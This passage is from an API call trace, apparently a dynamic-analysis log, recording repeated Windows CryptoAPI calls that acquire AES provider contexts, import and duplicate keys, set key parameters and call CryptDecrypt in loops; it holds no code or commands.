dwFlags=0x0) returned 1 [0223.426] CryptDecrypt (in: hKey=0x4b74590, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26f9860, pdwDataLen=0x18a220 | out: pbData=0x26f9860, pdwDataLen=0x18a220) returned 1 [0223.426] CryptDecrypt (in: hKey=0x4b74590, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x26f98a4, pdwDataLen=0x18a220 | out: pbData=0x26f98a4, pdwDataLen=0x18a220) returned 0 [0223.426] CryptDestroyKey (hKey=0x758e60) returned 1 [0223.426] CryptReleaseContext (hProv=0x772980, dwFlags=0x0) returned 1 [0223.426] CryptReleaseContext (hProv=0x772980, dwFlags=0x0) returned 1 [0223.426] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x772a08) returned 1 [0223.427] CryptImportKey (in: hProv=0x772a08, pbData=0x26f9bd4, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x758e60) returned 1 [0223.427] CryptContextAddRef (hProv=0x772a08, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.427] CryptContextAddRef (hProv=0x772a08, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.427] CryptDuplicateKey (in: hKey=0x758e60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4b74610) returned 1 [0223.427] CryptContextAddRef (hProv=0x772a08, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.427] CryptSetKeyParam (hKey=0x4b74610, dwParam=0x4, pbData=0x26fa344*=0x1, dwFlags=0x0) returned 1 [0223.427] CryptSetKeyParam (hKey=0x4b74610, dwParam=0x1, pbData=0x26fa310, dwFlags=0x0) returned 1 [0223.427] CryptDecrypt (in: hKey=0x4b74610, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26fa424, pdwDataLen=0x18a220 | out: pbData=0x26fa424, pdwDataLen=0x18a220) returned 1 [0223.427] CryptDecrypt (in: hKey=0x4b74610, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x26fa468, pdwDataLen=0x18a220 | out: pbData=0x26fa468, pdwDataLen=0x18a220) returned 0 [0223.428] CryptDestroyKey (hKey=0x758e60) returned 1 [0223.428] CryptReleaseContext (hProv=0x772a08, dwFlags=0x0) returned 1 [0223.428] CryptReleaseContext (hProv=0x772a08, dwFlags=0x0) returned 1 [0223.428] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x772a90) returned 1 [0223.428] CryptImportKey (in: hProv=0x772a90, pbData=0x26fa7f8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x758e60) returned 1 [0223.428] CryptContextAddRef (hProv=0x772a90, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.429] CryptContextAddRef (hProv=0x772a90, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.429] CryptDuplicateKey (in: hKey=0x758e60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4b74690) returned 1 [0223.429] CryptContextAddRef (hProv=0x772a90, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.429] CryptSetKeyParam (hKey=0x4b74690, dwParam=0x4, pbData=0x26faf78*=0x1, dwFlags=0x0) returned 1 [0223.429] CryptSetKeyParam (hKey=0x4b74690, dwParam=0x1, pbData=0x26faf44, dwFlags=0x0) returned 1 [0223.429] CryptDecrypt (in: hKey=0x4b74690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26fb05c, pdwDataLen=0x18a1f0 | out: pbData=0x26fb05c, pdwDataLen=0x18a1f0) returned 1 [0223.429] CryptDecrypt (in: hKey=0x4b74690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26fb0bc, pdwDataLen=0x18a220 | out: pbData=0x26fb0bc, pdwDataLen=0x18a220) returned 1 [0223.429] CryptDecrypt (in: hKey=0x4b74690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x26fb108, pdwDataLen=0x18a220 | out: pbData=0x26fb108, pdwDataLen=0x18a220) returned 0 [0223.429] CryptDestroyKey (hKey=0x758e60) returned 1 [0223.429] CryptReleaseContext (hProv=0x772a90, dwFlags=0x0) returned 1 [0223.429] CryptReleaseContext (hProv=0x772a90, dwFlags=0x0) returned 1 [0223.429] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x772b18) returned 1 [0223.430] CryptImportKey (in: hProv=0x772b18, pbData=0x26fb494, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x758e60) returned 1 [0223.430] CryptContextAddRef (hProv=0x772b18, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.430] CryptContextAddRef (hProv=0x772b18, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.431] CryptDuplicateKey (in: hKey=0x758e60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4b74710) returned 1 [0223.431] CryptContextAddRef (hProv=0x772b18, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.431] CryptSetKeyParam (hKey=0x4b74710, dwParam=0x4, pbData=0x26fbc14*=0x1, dwFlags=0x0) returned 1 [0223.431] CryptSetKeyParam (hKey=0x4b74710, dwParam=0x1, pbData=0x26fbbe0, dwFlags=0x0) returned 1 [0223.431] CryptDecrypt (in: hKey=0x4b74710, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26fbcf8, pdwDataLen=0x18a1f0 | out: pbData=0x26fbcf8, pdwDataLen=0x18a1f0) returned 1 [0223.431] CryptDecrypt (in: hKey=0x4b74710, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26fbd58, pdwDataLen=0x18a220 | out: pbData=0x26fbd58, pdwDataLen=0x18a220) returned 1 [0223.431] CryptDecrypt (in: hKey=0x4b74710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x26fbda4, pdwDataLen=0x18a220 | out: pbData=0x26fbda4, pdwDataLen=0x18a220) returned 0 [0223.431] CryptDestroyKey (hKey=0x758e60) returned 1 [0223.431] CryptReleaseContext (hProv=0x772b18, dwFlags=0x0) returned 1 [0223.431] CryptReleaseContext (hProv=0x772b18, dwFlags=0x0) returned 1 [0223.431] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x772ba0) returned 1 [0223.432] CryptImportKey (in: hProv=0x772ba0, pbData=0x26fc120, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x758e60) returned 1 [0223.432] CryptContextAddRef (hProv=0x772ba0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.432] CryptContextAddRef (hProv=0x772ba0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.432] CryptDuplicateKey (in: hKey=0x758e60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4b74790) returned 1 [0223.432] CryptContextAddRef (hProv=0x772ba0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.432] CryptSetKeyParam (hKey=0x4b74790, dwParam=0x4, pbData=0x26fc890*=0x1, dwFlags=0x0) returned 1 [0223.432] CryptSetKeyParam (hKey=0x4b74790, dwParam=0x1, pbData=0x26fc85c, dwFlags=0x0) returned 1 [0223.433] CryptDecrypt (in: hKey=0x4b74790, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26fc970, pdwDataLen=0x18a220 | out: pbData=0x26fc970, pdwDataLen=0x18a220) returned 1 [0223.433] CryptDecrypt (in: hKey=0x4b74790, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x26fc9c0, pdwDataLen=0x18a220 | out: pbData=0x26fc9c0, pdwDataLen=0x18a220) returned 0 [0223.433] CryptDestroyKey (hKey=0x758e60) returned 1 [0223.433] CryptReleaseContext (hProv=0x772ba0, dwFlags=0x0) returned 1 [0223.433] CryptReleaseContext (hProv=0x772ba0, dwFlags=0x0) returned 1 [0223.433] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x772c28) returned 1 [0223.434] CryptImportKey (in: hProv=0x772c28, pbData=0x26fcd14, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x758e60) returned 1 [0223.434] CryptContextAddRef (hProv=0x772c28, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.434] CryptContextAddRef (hProv=0x772c28, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.434] CryptDuplicateKey (in: hKey=0x758e60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4b74810) returned 1 [0223.434] CryptContextAddRef (hProv=0x772c28, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.434] CryptSetKeyParam (hKey=0x4b74810, dwParam=0x4, pbData=0x26fd484*=0x1, dwFlags=0x0) returned 1 [0223.434] CryptSetKeyParam (hKey=0x4b74810, dwParam=0x1, pbData=0x26fd450, dwFlags=0x0) returned 1 [0223.434] CryptDecrypt (in: hKey=0x4b74810, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26fd564, pdwDataLen=0x18a220 | out: pbData=0x26fd564, pdwDataLen=0x18a220) returned 1 [0223.434] CryptDecrypt (in: hKey=0x4b74810, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x26fd5a8, pdwDataLen=0x18a220 | out: pbData=0x26fd5a8, pdwDataLen=0x18a220) returned 0 [0223.435] CryptDestroyKey (hKey=0x758e60) returned 1 [0223.435] CryptReleaseContext (hProv=0x772c28, dwFlags=0x0) returned 1 [0223.435] CryptReleaseContext (hProv=0x772c28, dwFlags=0x0) returned 1 [0223.435] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x772cb0) returned 1 [0223.435] CryptImportKey (in: hProv=0x772cb0, pbData=0x26fd8d8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x758e60) returned 1 [0223.435] CryptContextAddRef (hProv=0x772cb0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.436] CryptContextAddRef (hProv=0x772cb0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.436] CryptDuplicateKey (in: hKey=0x758e60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4b74890) returned 1 [0223.436] CryptContextAddRef (hProv=0x772cb0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.436] CryptSetKeyParam (hKey=0x4b74890, dwParam=0x4, pbData=0x26fe048*=0x1, dwFlags=0x0) returned 1 [0223.436] CryptSetKeyParam (hKey=0x4b74890, dwParam=0x1, pbData=0x26fe014, dwFlags=0x0) returned 1 [0223.436] CryptDecrypt (in: hKey=0x4b74890, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26fe128, pdwDataLen=0x18a220 | out: pbData=0x26fe128, pdwDataLen=0x18a220) returned 1 [0223.436] CryptDecrypt (in: hKey=0x4b74890, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x26fe16c, pdwDataLen=0x18a220 | out: pbData=0x26fe16c, pdwDataLen=0x18a220) returned 0 [0223.436] CryptDestroyKey (hKey=0x758e60) returned 1 [0223.436] CryptReleaseContext (hProv=0x772cb0, dwFlags=0x0) returned 1 [0223.436] CryptReleaseContext (hProv=0x772cb0, dwFlags=0x0) returned 1 [0223.436] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x772d38) returned 1 [0223.437] CryptImportKey (in: hProv=0x772d38, pbData=0x26fe4b0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x758e60) returned 1 [0223.437] CryptContextAddRef (hProv=0x772d38, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.438] CryptContextAddRef (hProv=0x772d38, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.438] CryptDuplicateKey (in: hKey=0x758e60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4b74910) returned 1 [0223.438] CryptContextAddRef (hProv=0x772d38, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.438] CryptSetKeyParam (hKey=0x4b74910, dwParam=0x4, pbData=0x26fec30*=0x1, dwFlags=0x0) returned 1 [0223.438] CryptSetKeyParam (hKey=0x4b74910, dwParam=0x1, pbData=0x26febfc, dwFlags=0x0) returned 1 [0223.438] CryptDecrypt (in: hKey=0x4b74910, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26fed14, pdwDataLen=0x18a1f0 | out: pbData=0x26fed14, pdwDataLen=0x18a1f0) returned 1 [0223.438] CryptDecrypt (in: hKey=0x4b74910, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26fed74, pdwDataLen=0x18a220 | out: pbData=0x26fed74, pdwDataLen=0x18a220) returned 1 [0223.438] CryptDecrypt (in: hKey=0x4b74910, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x26fedbc, pdwDataLen=0x18a220 | out: pbData=0x26fedbc, pdwDataLen=0x18a220) returned 0 [0223.438] CryptDestroyKey (hKey=0x758e60) returned 1 [0223.438] CryptReleaseContext (hProv=0x772d38, dwFlags=0x0) returned 1 [0223.438] CryptReleaseContext (hProv=0x772d38, dwFlags=0x0) returned 1 [0223.438] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x772dc0) returned 1 [0223.439] CryptImportKey (in: hProv=0x772dc0, pbData=0x26ff124, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x758e60) returned 1 [0223.439] CryptContextAddRef (hProv=0x772dc0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.439] CryptContextAddRef (hProv=0x772dc0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.440] CryptDuplicateKey (in: hKey=0x758e60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4b74990) returned 1 [0223.440] CryptContextAddRef (hProv=0x772dc0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.440] CryptSetKeyParam (hKey=0x4b74990, dwParam=0x4, pbData=0x26ff894*=0x1, dwFlags=0x0) returned 1 [0223.440] CryptSetKeyParam (hKey=0x4b74990, dwParam=0x1, pbData=0x26ff860, dwFlags=0x0) returned 1 [0223.440] CryptDecrypt (in: hKey=0x4b74990, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26ff974, pdwDataLen=0x18a220 | out: pbData=0x26ff974, pdwDataLen=0x18a220) returned 1 [0223.440] CryptDecrypt (in: hKey=0x4b74990, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x26ff9bc, pdwDataLen=0x18a220 | out: pbData=0x26ff9bc, pdwDataLen=0x18a220) returned 0 [0223.440] CryptDestroyKey (hKey=0x758e60) returned 1 [0223.440] CryptReleaseContext (hProv=0x772dc0, dwFlags=0x0) returned 1 [0223.440] CryptReleaseContext (hProv=0x772dc0, dwFlags=0x0) returned 1 [0223.440] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x772e48) returned 1 [0223.441] CryptImportKey (in: hProv=0x772e48, pbData=0x26ffd14, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x758e60) returned 1 [0223.441] CryptContextAddRef (hProv=0x772e48, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.441] CryptContextAddRef (hProv=0x772e48, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.441] CryptDuplicateKey (in: hKey=0x758e60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4b74a10) returned 1 [0223.441] CryptContextAddRef (hProv=0x772e48, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.441] CryptSetKeyParam (hKey=0x4b74a10, dwParam=0x4, pbData=0x27004e4*=0x1, dwFlags=0x0) returned 1 [0223.441] CryptSetKeyParam (hKey=0x4b74a10, dwParam=0x1, pbData=0x27004b0, dwFlags=0x0) returned 1 [0223.441] CryptDecrypt (in: hKey=0x4b74a10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27005e8, pdwDataLen=0x18a1f0 | out: pbData=0x27005e8, pdwDataLen=0x18a1f0) returned 1 [0223.442] CryptDecrypt (in: hKey=0x4b74a10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2700658, pdwDataLen=0x18a220 | out: pbData=0x2700658, pdwDataLen=0x18a220) returned 1 [0223.442] CryptDecrypt (in: hKey=0x4b74a10, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27006a0, pdwDataLen=0x18a220 | out: pbData=0x27006a0, pdwDataLen=0x18a220) returned 0 [0223.442] CryptDestroyKey (hKey=0x758e60) returned 1 [0223.442] CryptReleaseContext (hProv=0x772e48, dwFlags=0x0) returned 1 [0223.442] CryptReleaseContext (hProv=0x772e48, dwFlags=0x0) returned 1 [0223.442] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x772ed0) returned 1 [0223.442] CryptImportKey (in: hProv=0x772ed0, pbData=0x2700ac8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x758e60) returned 1 [0223.442] CryptContextAddRef (hProv=0x772ed0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.443] CryptContextAddRef (hProv=0x772ed0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.443] CryptDuplicateKey (in: hKey=0x758e60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4b74a90) returned 1 [0223.443] CryptContextAddRef (hProv=0x772ed0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.443] CryptSetKeyParam (hKey=0x4b74a90, dwParam=0x4, pbData=0x2701238*=0x1, dwFlags=0x0) returned 1 [0223.443] CryptSetKeyParam (hKey=0x4b74a90, dwParam=0x1, pbData=0x2701204, dwFlags=0x0) returned 1 [0223.443] CryptDecrypt (in: hKey=0x4b74a90, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2701318, pdwDataLen=0x18a220 | out: pbData=0x2701318, pdwDataLen=0x18a220) returned 1 [0223.443] CryptDecrypt (in: hKey=0x4b74a90, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2701360, pdwDataLen=0x18a220 | out: pbData=0x2701360, pdwDataLen=0x18a220) returned 0 [0223.443] CryptDestroyKey (hKey=0x758e60) returned 1 [0223.443] CryptReleaseContext (hProv=0x772ed0, dwFlags=0x0) returned 1 [0223.443] CryptReleaseContext (hProv=0x772ed0, dwFlags=0x0) returned 1 [0223.443] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x772f58) returned 1 [0223.444] CryptImportKey (in: hProv=0x772f58, pbData=0x2701698, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x758e60) returned 1 [0223.444] CryptContextAddRef (hProv=0x772f58, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.445] CryptContextAddRef (hProv=0x772f58, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.445] CryptDuplicateKey (in: hKey=0x758e60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4b74b10) returned 1 [0223.445] CryptContextAddRef (hProv=0x772f58, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.445] CryptSetKeyParam (hKey=0x4b74b10, dwParam=0x4, pbData=0x2701e08*=0x1, dwFlags=0x0) returned 1 [0223.445] CryptSetKeyParam (hKey=0x4b74b10, dwParam=0x1, pbData=0x2701dd4, dwFlags=0x0) returned 1 [0223.445] CryptDecrypt (in: hKey=0x4b74b10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2701ee8, pdwDataLen=0x18a220 | out: pbData=0x2701ee8, pdwDataLen=0x18a220) returned 1 [0223.445] CryptDecrypt (in: hKey=0x4b74b10, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2701f30, pdwDataLen=0x18a220 | out: pbData=0x2701f30, pdwDataLen=0x18a220) returned 0 [0223.445] CryptDestroyKey (hKey=0x758e60) returned 1 [0223.445] CryptReleaseContext (hProv=0x772f58, dwFlags=0x0) returned 1 [0223.445] CryptReleaseContext (hProv=0x772f58, dwFlags=0x0) returned 1 [0223.445] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x772fe0) returned 1 [0223.446] CryptImportKey (in: hProv=0x772fe0, pbData=0x2702268, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x758e60) returned 1 [0223.446] CryptContextAddRef (hProv=0x772fe0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.446] CryptContextAddRef (hProv=0x772fe0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.446] CryptDuplicateKey (in: hKey=0x758e60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4b74b90) returned 1 [0223.446] CryptContextAddRef (hProv=0x772fe0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.446] CryptSetKeyParam (hKey=0x4b74b90, dwParam=0x4, pbData=0x27029d8*=0x1, dwFlags=0x0) returned 1 [0223.446] CryptSetKeyParam (hKey=0x4b74b90, dwParam=0x1, pbData=0x27029a4, dwFlags=0x0) returned 1 [0223.447] CryptDecrypt (in: hKey=0x4b74b90, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2702ab8, pdwDataLen=0x18a220 | out: pbData=0x2702ab8, pdwDataLen=0x18a220) returned 1 [0223.447] CryptDecrypt (in: hKey=0x4b74b90, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2702b00, pdwDataLen=0x18a220 | out: pbData=0x2702b00, pdwDataLen=0x18a220) returned 0 [0223.447] CryptDestroyKey (hKey=0x758e60) returned 1 [0223.447] CryptReleaseContext (hProv=0x772fe0, dwFlags=0x0) returned 1 [0223.447] CryptReleaseContext (hProv=0x772fe0, dwFlags=0x0) returned 1 [0223.447] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x773068) returned 1 [0223.448] CryptImportKey (in: hProv=0x773068, pbData=0x2702e3c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x758e60) returned 1 [0223.448] CryptContextAddRef (hProv=0x773068, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.448] CryptContextAddRef (hProv=0x773068, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.448] CryptDuplicateKey (in: hKey=0x758e60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4b74c10) returned 1 [0223.448] CryptContextAddRef (hProv=0x773068, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.448] CryptSetKeyParam (hKey=0x4b74c10, dwParam=0x4, pbData=0x27035ac*=0x1, dwFlags=0x0) returned 1 [0223.448] CryptSetKeyParam (hKey=0x4b74c10, dwParam=0x1, pbData=0x2703578, dwFlags=0x0) returned 1 [0223.448] CryptDecrypt (in: hKey=0x4b74c10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x270368c, pdwDataLen=0x18a220 | out: pbData=0x270368c, pdwDataLen=0x18a220) returned 1 [0223.448] CryptDecrypt (in: hKey=0x4b74c10, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27036d4, pdwDataLen=0x18a220 | out: pbData=0x27036d4, pdwDataLen=0x18a220) returned 0 [0223.448] CryptDestroyKey (hKey=0x758e60) returned 1 [0223.448] CryptReleaseContext (hProv=0x773068, dwFlags=0x0) returned 1 [0223.449] CryptReleaseContext (hProv=0x773068, dwFlags=0x0) returned 1 [0223.449] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x7730f0) returned 1 [0223.449] CryptImportKey (in: hProv=0x7730f0, pbData=0x2703a0c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x758e60) returned 1 [0223.449] CryptContextAddRef (hProv=0x7730f0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.449] CryptContextAddRef (hProv=0x7730f0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.449] CryptDuplicateKey (in: hKey=0x758e60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4b74c90) returned 1 [0223.450] CryptContextAddRef (hProv=0x7730f0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.450] CryptSetKeyParam (hKey=0x4b74c90, dwParam=0x4, pbData=0x270417c*=0x1, dwFlags=0x0) returned 1 [0223.450] CryptSetKeyParam (hKey=0x4b74c90, dwParam=0x1, pbData=0x2704148, dwFlags=0x0) returned 1 [0223.450] CryptDecrypt (in: hKey=0x4b74c90, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x270425c, pdwDataLen=0x18a220 | out: pbData=0x270425c, pdwDataLen=0x18a220) returned 1 [0223.450] CryptDecrypt (in: hKey=0x4b74c90, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27042a4, pdwDataLen=0x18a220 | out: pbData=0x27042a4, pdwDataLen=0x18a220) returned 0 [0223.450] CryptDestroyKey (hKey=0x758e60) returned 1 [0223.450] CryptReleaseContext (hProv=0x7730f0, dwFlags=0x0) returned 1 [0223.450] CryptReleaseContext (hProv=0x7730f0, dwFlags=0x0) returned 1 [0223.450] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x773178) returned 1 [0223.451] CryptImportKey (in: hProv=0x773178, pbData=0x27045dc, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x758e60) returned 1 [0223.451] CryptContextAddRef (hProv=0x773178, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.451] CryptContextAddRef (hProv=0x773178, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.451] CryptDuplicateKey (in: hKey=0x758e60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4b74d10) returned 1 [0223.451] CryptContextAddRef (hProv=0x773178, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.451] CryptSetKeyParam (hKey=0x4b74d10, dwParam=0x4, pbData=0x2704d4c*=0x1, dwFlags=0x0) returned 1 [0223.451] CryptSetKeyParam (hKey=0x4b74d10, dwParam=0x1, pbData=0x2704d18, dwFlags=0x0) returned 1 [0223.451] CryptDecrypt (in: hKey=0x4b74d10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2704e2c, pdwDataLen=0x18a220 | out: pbData=0x2704e2c, pdwDataLen=0x18a220) returned 1 [0223.451] CryptDecrypt (in: hKey=0x4b74d10, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2704e74, pdwDataLen=0x18a220 | out: pbData=0x2704e74, pdwDataLen=0x18a220) returned 0 [0223.451] CryptDestroyKey (hKey=0x758e60) returned 1 [0223.451] CryptReleaseContext (hProv=0x773178, dwFlags=0x0) returned 1 [0223.451] CryptReleaseContext (hProv=0x773178, dwFlags=0x0) returned 1 [0223.451] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x773200) returned 1 